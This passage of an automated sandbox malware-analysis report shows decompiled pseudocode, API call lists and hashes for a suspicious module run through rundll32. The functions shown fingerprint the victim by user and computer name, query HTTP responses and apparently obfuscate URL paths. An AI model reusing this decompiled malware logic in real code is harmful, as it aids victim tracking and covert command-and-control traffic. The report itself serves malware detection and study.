                                      • lstrlenW.KERNEL32(80000002), ref: 04DE279F
                                      • wsprintfW.USER32 ref: 04DE27E5
                                      • lstrlen.KERNEL32(?,00000004), ref: 04DE2808
                                      • lstrlen.KERNEL32(?), ref: 04DE2811
                                      • lstrlen.KERNEL32(?), ref: 04DE2818
                                      • lstrlenW.KERNEL32(?), ref: 04DE281F
                                      • wsprintfW.USER32 ref: 04DE2856
                                        • Part of subcall function 04DE4C73: RtlFreeHeap.NTDLL(00000000,00000000,04DE55C4,00000000,?,?,00000000), ref: 04DE4C7F
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: lstrlen$wsprintf$CountFreeHeapTick
                                      • String ID:
                                      • API String ID: 822878831-0
                                      • Opcode ID: 23e761b9946afb14c8bfb76a870564656173d5ecbad3bca0a57403efbe59f839
                                      • Instruction ID: 9b3505458e03ee13cc4ccfb1212c9d9162e6e1ce94451adbe54829cc7e0d00d2
                                      • Opcode Fuzzy Hash: 23e761b9946afb14c8bfb76a870564656173d5ecbad3bca0a57403efbe59f839
                                      • Instruction Fuzzy Hash: AA516572E00219ABDF11BFA6DC449EE7BB5FF44354F058065F904AB210DB35EA11DBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE5F21 Relevance: 10.6, APIs: 7, Instructions: 92networksynchronizationCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E04DE5F21(void* __ecx, void* __esi) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				void* _t58;
				void* _t59;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_v8 = 4;
						_v16 = 0;
						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
							_t58 = E04DE4DF6(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
									E04DE4C73(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *(_t61 + 0xc) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E04DE3A6F( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}














                                      0x04de5f21
                                      0x04de5f21
                                      0x04de5f31
                                      0x04de5f34
                                      0x04de5f38
                                      0x04de5f3e
                                      0x04de5f43
                                      0x04de5f5c
                                      0x04de5f70
                                      0x04de5f77
                                      0x04de5f7e
                                      0x04de5fd1
                                      0x04de5fd7
                                      0x04de5fdd
                                      0x04de6018
                                      0x04de601e
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x04de5fdd
                                      0x04de5f84
                                      0x00000000
                                      0x04de5f8b
                                      0x04de5f99
                                      0x04de5f9c
                                      0x04de5f9f
                                      0x04de5fab
                                      0x04de5faf
                                      0x04de6011
                                      0x04de5fb1
                                      0x04de5fc3
                                      0x04de6001
                                      0x04de600c
                                      0x04de5fc5
                                      0x04de5fc8
                                      0x04de5fcc
                                      0x04de5fcc
                                      0x04de5fc3
                                      0x00000000
                                      0x04de5faf
                                      0x04de5f84
                                      0x04de5f48
                                      0x04de5f4e
                                      0x04de5f51
                                      0x04de5f56
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x04de5fe6
                                      0x04de5fee
                                      0x04de5ff3
                                      0x04de5ff6
                                      0x00000000

                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,770481D0), ref: 04DE5F38
                                      • SetEvent.KERNEL32(?), ref: 04DE5F48
                                      • HttpQueryInfoA.WININET(?,20000013,?,?), ref: 04DE5F7A
                                      • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 04DE5F9F
                                      • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 04DE5FBF
                                      • GetLastError.KERNEL32 ref: 04DE5FD1
                                        • Part of subcall function 04DE3A6F: WaitForMultipleObjects.KERNEL32(00000002,04DE7B35,00000000,04DE7B35,?,?,?,04DE7B35,0000EA60), ref: 04DE3A8A
                                        • Part of subcall function 04DE4C73: RtlFreeHeap.NTDLL(00000000,00000000,04DE55C4,00000000,?,?,00000000), ref: 04DE4C7F
                                      • GetLastError.KERNEL32(00000000), ref: 04DE6006
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                      • String ID:
                                      • API String ID: 3369646462-0
                                      • Opcode ID: fa339b50003b9beac979b75ac136fc4a397d3a1af0599e1ec2fc21a759380c81
                                      • Instruction ID: ba06d8c87e230409f9d469781ca32cd5e539b4047911c00a6e3c6361e304e065
                                      • Opcode Fuzzy Hash: fa339b50003b9beac979b75ac136fc4a397d3a1af0599e1ec2fc21a759380c81
                                      • Instruction Fuzzy Hash: 223144B5A00309EFDB20EFA6D8949AEB7B8FB04354F5049AAD542A2240D731EB449F60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE72E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 61memorystringCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 68%
                                      			E04DE72E7(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x4dea2d8, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x4dea2f0; // 0x2d16b28d
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x4dea2f0 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                                      0x04de72ef
                                      0x04de72f2
                                      0x04de72f8
                                      0x04de7310
                                      0x04de7312
                                      0x04de7317
                                      0x04de7319
                                      0x04de731c
                                      0x04de731e
                                      0x04de7321
                                      0x04de7323
                                      0x04de7323
                                      0x04de7325
                                      0x04de7330
                                      0x04de7335
                                      0x04de7346
                                      0x04de734e
                                      0x04de7353
                                      0x04de7356
                                      0x04de7359
                                      0x04de735b
                                      0x04de735e
                                      0x04de7361
                                      0x04de7361
                                      0x04de7364
                                      0x04de736f
                                      0x04de7374
                                      0x04de737e

                                      APIs
                                      • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04DE37CC,00000000,?,?,04DE653D,?,054A95B0), ref: 04DE72F2
                                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 04DE730A
                                      • memcpy.NTDLL(00000000,?,-00000008,?,?,?,04DE37CC,00000000,?,?,04DE653D,?,054A95B0), ref: 04DE734E
                                      • memcpy.NTDLL(00000001,?,00000001), ref: 04DE736F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: memcpy$AllocateHeaplstrlen
                                      • String ID: FNwPq
                                      • API String ID: 1819133394-3591455833
                                      • Opcode ID: 1b511f928bc25ec19a1e666c19bdd8e4e53f5d0e9bf9fd99f1deb908f1336064
                                      • Instruction ID: 1a941ce95b34049401685e9f2d78bba20c5a6d3f2f04d8bf5a7f592c999fd206
                                      • Opcode Fuzzy Hash: 1b511f928bc25ec19a1e666c19bdd8e4e53f5d0e9bf9fd99f1deb908f1336064
                                      • Instruction Fuzzy Hash: 66110672B00215AFD7109E6ADC84DAEBBAAEBC4360B050276F9049B341E7759E0087A0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE3268 Relevance: 7.6, APIs: 5, Instructions: 83COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E04DE3268() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t64 = E04DE4DF6(_v12 + _t43 + 2 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E04DE4C73(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t56 + 2, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}















                                      0x04de3276
                                      0x04de3279
                                      0x04de327c
                                      0x04de3282
                                      0x04de3287
                                      0x04de328d
                                      0x04de3295
                                      0x04de3298
                                      0x04de329e
                                      0x04de32a3
                                      0x04de32b0
                                      0x04de32bd
                                      0x04de32c1
                                      0x04de32c3
                                      0x04de32c7
                                      0x04de32ca
                                      0x04de32da
                                      0x04de332d
                                      0x04de332e
                                      0x04de32dc
                                      0x04de32e1
                                      0x04de32e2
                                      0x04de32e7
                                      0x04de32ea
                                      0x04de32fd
                                      0x00000000
                                      0x04de32ff
                                      0x04de3302
                                      0x04de3315
                                      0x04de3318
                                      0x04de331e
                                      0x04de3323
                                      0x00000000
                                      0x04de3325
                                      0x04de3325
                                      0x04de3328
                                      0x04de3328
                                      0x04de3323
                                      0x04de32fd
                                      0x04de3333
                                      0x04de3334
                                      0x04de32a3
                                      0x04de333a

                                      APIs
                                      • GetUserNameW.ADVAPI32(00000000,?), ref: 04DE327C
                                      • GetComputerNameW.KERNEL32(00000000,?), ref: 04DE3298
                                        • Part of subcall function 04DE4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04DE5522), ref: 04DE4E02
                                      • GetUserNameW.ADVAPI32(00000000,?), ref: 04DE32D2
                                      • GetComputerNameW.KERNEL32(?,?), ref: 04DE32F5
                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,?,00000000,?,00000000,00000000), ref: 04DE3318
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                      • String ID:
                                      • API String ID: 3850880919-0
                                      • Opcode ID: ae59b1d7e41185c24f79cd18eebadcdc04e9cc9e4e32d20b83920d5e221eb1fc
                                      • Instruction ID: ac718c6b77ef739f086af35be95686283bb69c75485a793b49ca96f4d9ef6b0a
                                      • Opcode Fuzzy Hash: ae59b1d7e41185c24f79cd18eebadcdc04e9cc9e4e32d20b83920d5e221eb1fc
                                      • Instruction Fuzzy Hash: 8021C9B6A00108FFDB11EFE6D994CFEBBB8EE44300B5044AAE511E7240DA34AB45DB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE3394 Relevance: 6.2, APIs: 4, Instructions: 154memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SysAllocString.OLEAUT32(?), ref: 04DE33CF
                                      • SysFreeString.OLEAUT32(00000000), ref: 04DE34B4
                                        • Part of subcall function 04DE5D8F: SysAllocString.OLEAUT32(04DE9290), ref: 04DE5DDF
                                      • SafeArrayDestroy.OLEAUT32(00000000), ref: 04DE3507
                                      • SysFreeString.OLEAUT32(00000000), ref: 04DE3516
                                        • Part of subcall function 04DE3FDD: Sleep.KERNEL32(000001F4), ref: 04DE4025
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: String$AllocFree$ArrayDestroySafeSleep
                                      • String ID:
                                      • API String ID: 3193056040-0
                                      • Opcode ID: 256bb632aad43cff16f471bbf20a9b0a5982973b7d3baa425a75e0f975129fb8
                                      • Instruction ID: 9c6bcc452f4841aa54c2121b51d8ce4877342a701f97bec2b8cf91d8d114c951
                                      • Opcode Fuzzy Hash: 256bb632aad43cff16f471bbf20a9b0a5982973b7d3baa425a75e0f975129fb8
                                      • Instruction Fuzzy Hash: 14513C75600609AFDB02EFE9C844ABEB7B6FF88704B148469E905DB320DB75ED45CB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE5D8F Relevance: 6.2, APIs: 4, Instructions: 154memorystringCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 46%
                                      			E04DE5D8F(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x4dea348; // 0x6bd5a8
					_t5 = _t103 + 0x4deb038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x4de9290);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x4dea348; // 0x6bd5a8
												_t28 = _t109 + 0x4deb0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x4dea348; // 0x6bd5a8
														_t33 = _t79 + 0x4deb078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}





































                                      0x04de5d94
                                      0x04de5d9d
                                      0x04de5d9e
                                      0x04de5da2
                                      0x04de5da8
                                      0x04de5dae
                                      0x04de5db7
                                      0x04de5dbd
                                      0x04de5dc7
                                      0x04de5dc9
                                      0x04de5dcf
                                      0x04de5dd4
                                      0x04de5ddf
                                      0x04de5de5
                                      0x04de5dea
                                      0x04de5f0c
                                      0x04de5df0
                                      0x04de5df0
                                      0x04de5dfd
                                      0x04de5e03
                                      0x04de5e09
                                      0x04de5e0d
                                      0x04de5e13
                                      0x04de5e20
                                      0x04de5e24
                                      0x04de5e2a
                                      0x04de5e2d
                                      0x04de5e35
                                      0x04de5e36
                                      0x04de5e3a
                                      0x04de5e3e
                                      0x04de5e41
                                      0x04de5e44
                                      0x04de5e4a
                                      0x04de5e53
                                      0x04de5e59
                                      0x04de5e5a
                                      0x04de5e5d
                                      0x04de5e5e
                                      0x04de5e5f
                                      0x04de5e67
                                      0x04de5e68
                                      0x04de5e69
                                      0x04de5e6b
                                      0x04de5e6f
                                      0x04de5e73
                                      0x00000000
                                      0x00000000
                                      0x04de5e79
                                      0x04de5e82
                                      0x04de5e88
                                      0x04de5e92
                                      0x04de5e96
                                      0x04de5e98
                                      0x04de5ea5
                                      0x04de5ea9
                                      0x04de5eb1
                                      0x04de5eb6
                                      0x04de5ec8
                                      0x04de5eca
                                      0x04de5ed0
                                      0x04de5ed0
                                      0x04de5ed9
                                      0x04de5ed9
                                      0x04de5edb
                                      0x04de5ee1
                                      0x04de5ee1
                                      0x04de5ee4
                                      0x04de5eea
                                      0x04de5eed
                                      0x04de5ef6
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x04de5ef6
                                      0x04de5e4a
                                      0x04de5e44
                                      0x04de5e2d
                                      0x04de5efc
                                      0x04de5efc
                                      0x04de5f02
                                      0x04de5f02
                                      0x04de5f08
                                      0x04de5f08
                                      0x04de5f11
                                      0x04de5f17
                                      0x04de5f17
                                      0x04de5dd4
                                      0x04de5f20

                                      APIs
                                      • SysAllocString.OLEAUT32(04DE9290), ref: 04DE5DDF
                                      • lstrcmpW.KERNEL32(00000000,0076006F), ref: 04DE5EC0
                                      • SysFreeString.OLEAUT32(00000000), ref: 04DE5ED9
                                      • SysFreeString.OLEAUT32(?), ref: 04DE5F08
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: String$Free$Alloclstrcmp
                                      • String ID:
                                      • API String ID: 1885612795-0
                                      • Opcode ID: 5fb4f3923b449f4bd03ac6d0aa7277c5d13a55055de2dd3438c3b8af4d0f99ed
                                      • Instruction ID: 8d59f4dc6b5c7a5ffeddbbf5c4e8f894712f3fa5e617580d660c4fca89cabecf
                                      • Opcode Fuzzy Hash: 5fb4f3923b449f4bd03ac6d0aa7277c5d13a55055de2dd3438c3b8af4d0f99ed
                                      • Instruction Fuzzy Hash: BF516E75E0051AEFCB00EFE9D4989AEB7B9FF88704B248585E915EB310D731AD41CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE35A2 Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 85%
                                      			E04DE35A2(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E04DE13E0(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E04DE7099(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E04DE381E(_t101,  &_v428, _a8, _t96 - _t81);
					E04DE381E(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E04DE7099(_t101, 0x4dea1d0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E04DE7099(_a16, _a4);
						E04DE4191(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L04DE81CA();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L04DE81C4();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E04DE3ADE(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E04DE40E5(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E04DE5908(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x4dea1d0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                                      0x04de35a5
                                      0x04de35b1
                                      0x04de35b7
                                      0x04de35bc
                                      0x04de35c0
                                      0x04de3732
                                      0x04de3736
                                      0x04de3736
                                      0x04de35c6
                                      0x04de35ca
                                      0x04de35ce
                                      0x04de35d1
                                      0x04de35dc
                                      0x04de35e2
                                      0x04de35e7
                                      0x04de35ea
                                      0x04de3604
                                      0x04de3613
                                      0x04de361f
                                      0x04de3629
                                      0x04de362e
                                      0x04de3630
                                      0x04de3633
                                      0x04de36ea
                                      0x04de36f0
                                      0x04de3701
                                      0x04de3714
                                      0x04de372a
                                      0x00000000
                                      0x04de372f
                                      0x04de363c
                                      0x04de3643
                                      0x04de3647
                                      0x04de364d
                                      0x04de364f
                                      0x04de3651
                                      0x04de3653
                                      0x04de3655
                                      0x04de365f
                                      0x04de3664
                                      0x04de3666
                                      0x04de3668
                                      0x04de3669
                                      0x04de366a
                                      0x04de366b
                                      0x04de3672
                                      0x04de3679
                                      0x04de367c
                                      0x04de367c
                                      0x04de3649
                                      0x04de3649
                                      0x04de3649
                                      0x04de3684
                                      0x04de368c
                                      0x04de3698
                                      0x04de369d
                                      0x04de369d
                                      0x04de36a2
                                      0x00000000
                                      0x00000000
                                      0x04de36a4
                                      0x04de36a7
                                      0x04de36b4
                                      0x00000000
                                      0x00000000
                                      0x04de36b6
                                      0x04de36b6
                                      0x04de36c3
                                      0x04de369d
                                      0x04de36a2
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x04de36a2
                                      0x04de36cd
                                      0x04de36d0
                                      0x04de36d3
                                      0x04de36da
                                      0x04de36da
                                      0x04de36e7
                                      0x00000000
                                      0x04de36e7
                                      0x04de35d3
                                      0x04de35d7
                                      0x04de35d8
                                      0x04de35da
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x04de35da
                                      0x00000000

                                      APIs
                                      • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04DE3655
                                      • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04DE366B
                                      • memset.NTDLL ref: 04DE3714
